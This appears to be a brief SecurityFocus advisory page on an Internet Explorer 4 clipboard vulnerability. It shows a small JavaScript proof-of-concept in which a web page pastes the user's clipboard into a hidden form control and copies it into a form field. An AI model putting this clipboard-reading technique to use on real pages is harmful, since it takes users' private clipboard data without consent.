Microsoft IE4 Clipboard Paste Vulnerability

function GetClipBoard()
{
tb.paste(); // paste over the MS Forms 2.0 TextBox
document.forms(0).S1.value=tb.text; // moves the text to the text area box
}


 

Privacy Statement
Copyright 2010, SecurityFocus